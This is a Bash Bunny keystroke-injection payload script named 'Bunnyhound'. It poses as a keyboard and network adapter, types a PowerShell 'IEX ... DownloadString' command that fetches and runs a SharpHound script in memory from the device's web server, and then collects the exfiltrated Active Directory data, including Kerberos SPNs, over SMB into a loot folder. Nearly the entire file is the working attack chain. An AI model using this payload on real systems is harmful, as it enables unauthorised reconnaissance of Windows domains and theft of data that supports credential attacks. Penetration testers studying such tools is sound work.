#!/bin/bash
#
# Title:         Bunnyhound
# Author:        golem445
# Version:       1.0
# Dependencies:  Impacket, gohttp
# Runtime:		 Dependent on domain size
#
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# then uses HID to import Sharphound into memory via local
# web server and execute the attack. Results are exported
# to the loot directory via SMB.

# Start Setup
LED SETUP

# Check dependencies
REQUIRETOOL impacket gohttp
GET SWITCH_POSITION

# Temporary loot directory
mkdir -p /loot/smb/

# Permanent loot directory
mkdir -p /root/udisk/loot/bunnyhound_exfil/

# Set interfaces 
ATTACKMODE RNDIS_ETHERNET HID

# Start web server
cd /root/udisk/payloads/$SWITCH_POSITION
gohttp -p 80 &

# Start SMB Server
python /tools/impacket/examples/smbserver.py s /loot/smb &

# Start attack
LED ATTACK
RUN WIN powershell
Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
Q ENTER

# Wait until files are done copying.
LED STAGE2
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

# Start Cleanup 
LED CLEANUP

# Delete Exfil file
rm /loot/smb/EXFILTRATION_COMPLETE

# Move Kerberos SPNS to permanent loot directory
mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/

# Clean up temporary loot directory
rm -rf /loot/smb/*

# Sync file system
sync

# Complete
LED FINISH